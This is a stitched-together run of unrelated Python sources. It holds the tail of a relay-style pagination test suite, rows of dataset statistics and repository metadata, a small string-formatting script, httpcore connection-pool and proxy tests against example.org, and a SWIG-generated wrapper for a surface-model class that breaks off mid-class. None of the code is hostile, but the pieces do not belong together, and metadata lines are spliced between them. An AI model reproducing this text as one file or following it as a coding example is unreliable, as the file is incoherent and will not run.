expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_first_after_before_many():
c = connection_from_list(letters, dict(
first=4, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_first_after_before_exact():
c = connection_from_list(letters, dict(
first=3, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_last_after_before_few():
c = connection_from_list(letters, dict(
last=2, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': True,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_last_after_before_many():
c = connection_from_list(letters, dict(
last=4, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_last_after_before_exact():
c = connection_from_list(letters, dict(
last=3, after='YXJyYXljb25uZWN0aW9uOjA=', before='YXJyYXljb25uZWN0aW9uOjQ=',
))
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_no_elements_first_0():
c = connection_from_list(letters, dict(first=0))
expected = {
'edges': [
],
'pageInfo': {
'startCursor': None,
'endCursor': None,
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_all_elements_invalid_cursors():
c = connection_from_list(letters, dict(before='invalid', after='invalid'))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_all_elements_cursor_outside():
c = connection_from_list(letters, dict(
before='YXJyYXljb25uZWN0aW9uOjYK', after='YXJyYXljb25uZWN0aW9uOi0xCg=='
))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_no_elements_cursors_cross():
c = connection_from_list(letters, dict(
before='YXJyYXljb25uZWN0aW9uOjI=', after='YXJyYXljb25uZWN0aW9uOjQ='
))
expected = {
'edges': [
],
'pageInfo': {
'startCursor': None,
'endCursor': None,
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_cursor_for_object_in_connection_member_object():
letter_b_cursor = cursor_for_object_in_connection(letters, 'B')
assert letter_b_cursor == 'YXJyYXljb25uZWN0aW9uOjE='
def test_cursor_for_object_in_connection_non_member_object():
letter_b_cursor = cursor_for_object_in_connection(letters, 'F')
assert letter_b_cursor is None
def test_promised_list_returns_all_elements_without_filters():
c = connection_from_promised_list(letters_promise)
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.value.to_dict() == expected
def test_promised_list_respects_a_smaller_first():
c = connection_from_promised_list(letters_promise, dict(first=2))
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.value.to_dict() == expected
def test_list_slice_works_with_a_just_right_array_slice():
c = connection_from_list_slice(
letters[1:3],
dict(
first=2,
after='YXJyYXljb25uZWN0aW9uOjA=',
),
slice_start=1,
list_length=5
)
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_oversized_array_slice_left_side():
c = connection_from_list_slice(
letters[0:3],
dict(
first=2,
after='YXJyYXljb25uZWN0aW9uOjA=',
),
slice_start=0,
list_length=5
)
expected = {
'edges': [
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_oversized_array_slice_right_side():
c = connection_from_list_slice(
letters[2:4],
dict(
first=1,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=2,
list_length=5
)
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_oversized_array_slice_both_sides():
c = connection_from_list_slice(
letters[1:4],
dict(
first=1,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=1,
list_length=5
)
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_undersized_array_slice_left_side():
c = connection_from_list_slice(
letters[3:5],
dict(
first=3,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=3,
list_length=5
)
expected = {
'edges': [
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
{
'node': 'E',
'cursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjQ=',
'hasPreviousPage': False,
'hasNextPage': False,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_undersized_array_slice_right_side():
c = connection_from_list_slice(
letters[2:4],
dict(
first=3,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=2,
list_length=5
)
expected = {
'edges': [
{
'node': 'C',
'cursor': 'YXJyYXljb25uZWN0aW9uOjI=',
},
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjI=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_list_slice_works_with_an_undersized_array_slice_both_sides():
c = connection_from_list_slice(
letters[3:4],
dict(
first=3,
after='YXJyYXljb25uZWN0aW9uOjE=',
),
slice_start=3,
list_length=5
)
expected = {
'edges': [
{
'node': 'D',
'cursor': 'YXJyYXljb25uZWN0aW9uOjM=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjM=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.to_dict() == expected
def test_promised_list_slice_respects_a_smaller_first():
letters_promise_slice = Promise.resolve(letters[:3])
c = connection_from_promised_list_slice(
letters_promise_slice,
dict(first=2),
slice_start=0,
list_length=5
)
expected = {
'edges': [
{
'node': 'A',
'cursor': 'YXJyYXljb25uZWN0aW9uOjA=',
},
{
'node': 'B',
'cursor': 'YXJyYXljb25uZWN0aW9uOjE=',
},
],
'pageInfo': {
'startCursor': 'YXJyYXljb25uZWN0aW9uOjA=',
'endCursor': 'YXJyYXljb25uZWN0aW9uOjE=',
'hasPreviousPage': False,
'hasNextPage': True,
}
}
assert c.value.to_dict() == expected
| 27.100239 | 86 | 0.470145 | 1,444 | 22,710 | 7.161357 | 0.064404 | 0.044677 | 0.042066 | 0.04603 | 0.938304 | 0.922445 | 0.917319 | 0.881636 | 0.825549 | 0.790156 | 0 | 0.050658 | 0.401101 | 22,710 | 837 | 87 | 27.132616 | 0.709654 | 0 | 0 | 0.623545 | 0 | 0 | 0.278688 | 0.166094 | 0 | 0 | 0 | 0 | 0.040103 | 1 | 0.040103 | false | 0 | 0.002587 | 0 | 0.042691 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4989265fbd96bd43ea5729332e6f5eabf460f6b | 178 | py | Python | pythonMundoTres/test.py | HendrylNogueira/CursoPython3 | c3d9d4e2a27312b83d744aaf0f8d01b26e6faf4f | [
"MIT"
] | null | null | null | pythonMundoTres/test.py | HendrylNogueira/CursoPython3 | c3d9d4e2a27312b83d744aaf0f8d01b26e6faf4f | [
"MIT"
] | null | null | null | pythonMundoTres/test.py | HendrylNogueira/CursoPython3 | c3d9d4e2a27312b83d744aaf0f8d01b26e6faf4f | [
"MIT"
] | null | null | null | print(f'{"cod nome":<18} {"gols":<10} {"total":>20}')
print(f'-' * 50)
print(f'{"0 "}', end='')
print(f'{"nome":<17}', end='')
print(f'{"3, 4":<10}', end='')
print(f'{"5":>20}')
| 25.428571 | 53 | 0.466292 | 31 | 178 | 2.677419 | 0.516129 | 0.433735 | 0.325301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.089888 | 178 | 6 | 54 | 29.666667 | 0.401235 | 0 | 0 | 0 | 0 | 0 | 0.466292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d49a86991f989be87ffd0222267e751018dbe977 | 8,037 | py | Python | tests/sync_tests/test_interfaces.py | simonw/httpcore | e3fc57660731f586cffab8a6f9fb0fdd69b7e344 | [
"BSD-3-Clause"
] | null | null | null | tests/sync_tests/test_interfaces.py | simonw/httpcore | e3fc57660731f586cffab8a6f9fb0fdd69b7e344 | [
"BSD-3-Clause"
] | null | null | null | tests/sync_tests/test_interfaces.py | simonw/httpcore | e3fc57660731f586cffab8a6f9fb0fdd69b7e344 | [
"BSD-3-Clause"
] | null | null | null | import ssl
import typing
import pytest
import httpcore
def read_body(stream: httpcore.SyncByteStream) -> bytes:
try:
body = []
for chunk in stream:
body.append(chunk)
return b"".join(body)
finally:
stream.close()
def test_http_request() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_https_request() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_http2_request() -> None:
with httpcore.SyncConnectionPool(http2=True) as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/2"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_closing_http_request() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org"), (b"connection", b"close")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert url[:3] not in http._connections # type: ignore
def test_http_request_reuse_connection() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_https_request_reuse_connection() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_http_request_cannot_reuse_dropped_connection() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
# Mock the connection as having been dropped.
connection = list(http._connections[url[:3]])[0] # type: ignore
connection.is_connection_dropped = lambda: True
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
@pytest.mark.parametrize("proxy_mode", ["DEFAULT", "FORWARD_ONLY", "TUNNEL_ONLY"])
def test_http_proxy(
proxy_server: typing.Tuple[bytes, bytes, int], proxy_mode: str
) -> None:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
max_connections = 1
max_keepalive = 2
with httpcore.SyncHTTPProxy(
proxy_server,
proxy_mode=proxy_mode,
max_connections=max_connections,
max_keepalive=max_keepalive,
) as http:
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
# mitmproxy does not support forwarding HTTPS requests
@pytest.mark.parametrize("proxy_mode", ["DEFAULT", "TUNNEL_ONLY"])
@pytest.mark.parametrize("http2", [False, True])
def test_proxy_https_requests(
proxy_server: typing.Tuple[bytes, bytes, int],
ca_ssl_context: ssl.SSLContext,
proxy_mode: str,
http2: bool,
) -> None:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
max_connections = 1
max_keepalive = 2
with httpcore.SyncHTTPProxy(
proxy_server,
proxy_mode=proxy_mode,
ssl_context=ca_ssl_context,
max_connections=max_connections,
max_keepalive=max_keepalive,
http2=http2,
) as http:
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
_ = read_body(stream)
assert http_version == (b"HTTP/2" if http2 else b"HTTP/1.1")
assert status_code == 200
assert reason == b"OK"
@pytest.mark.parametrize(
"http2,expected",
[
(False, ["HTTP/1.1, ACTIVE", "HTTP/1.1, ACTIVE"]),
(True, ["HTTP/2, ACTIVE, 2 streams"]),
],
)
def test_connection_pool_get_connection_info(http2, expected) -> None:
with httpcore.SyncConnectionPool(http2=http2) as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
for _ in range(2):
_ = http.request(method, url, headers)
stats = http.get_connection_info()
assert stats == {"https://example.org": expected}
| 31.272374 | 82 | 0.588652 | 1,008 | 8,037 | 4.550595 | 0.10119 | 0.058862 | 0.06235 | 0.036843 | 0.819054 | 0.794637 | 0.769784 | 0.754524 | 0.731851 | 0.723567 | 0 | 0.02324 | 0.277218 | 8,037 | 256 | 83 | 31.394531 | 0.766397 | 0.029737 | 0 | 0.686275 | 0 | 0 | 0.096351 | 0 | 0 | 0 | 0 | 0 | 0.230392 | 1 | 0.053922 | false | 0 | 0.019608 | 0 | 0.078431 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4eb0ec2d3c0017e839ae331eefdaf9c38b51735 | 11,364 | py | Python | SimModel_Python_API/simmodel_swig/Release/SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 3 | 2016-05-30T15:12:16.000Z | 2022-03-22T08:11:13.000Z | SimModel_Python_API/simmodel_swig/Release/SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 21 | 2016-06-13T11:33:45.000Z | 2017-05-23T09:46:52.000Z | SimModel_Python_API/simmodel_swig/Release/SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default', [dirname(__file__)])
except ImportError:
import _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
if fp is not None:
try:
_mod = imp.load_module('_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default', fp, pathname, description)
finally:
fp.close()
return _mod
_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default = swig_import_helper()
del swig_import_helper
else:
import _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import base
class SimGeomSurfaceModel(base.SimGeometricRepresentationItem):
__swig_setmethods__ = {}
for _s in [base.SimGeometricRepresentationItem]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel, name, value)
__swig_getmethods__ = {}
for _s in [base.SimGeometricRepresentationItem]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel__clone(self, f, c)
__swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel
__del__ = lambda self: None
SimGeomSurfaceModel_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_swigregister
SimGeomSurfaceModel_swigregister(SimGeomSurfaceModel)
class SimGeomSurfaceModel_FaceBasedSurfaceModel(SimGeomSurfaceModel):
__swig_setmethods__ = {}
for _s in [SimGeomSurfaceModel]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel, name, value)
__swig_getmethods__ = {}
for _s in [SimGeomSurfaceModel]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel, name)
__repr__ = _swig_repr
def FbsmFaces(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_FbsmFaces(self, *args)
def __init__(self, *args):
this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel_FaceBasedSurfaceModel(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel__clone(self, f, c)
__swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel_FaceBasedSurfaceModel
__del__ = lambda self: None
SimGeomSurfaceModel_FaceBasedSurfaceModel_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_swigregister
SimGeomSurfaceModel_FaceBasedSurfaceModel_swigregister(SimGeomSurfaceModel_FaceBasedSurfaceModel)
class SimGeomSurfaceModel_FaceBasedSurfaceModel_Default(SimGeomSurfaceModel_FaceBasedSurfaceModel):
__swig_setmethods__ = {}
for _s in [SimGeomSurfaceModel_FaceBasedSurfaceModel]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default, name, value)
__swig_getmethods__ = {}
for _s in [SimGeomSurfaceModel_FaceBasedSurfaceModel]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default__clone(self, f, c)
__swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
__del__ = lambda self: None
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_swigregister
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_swigregister(SimGeomSurfaceModel_FaceBasedSurfaceModel_Default)
class SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence, name)
__repr__ = _swig_repr
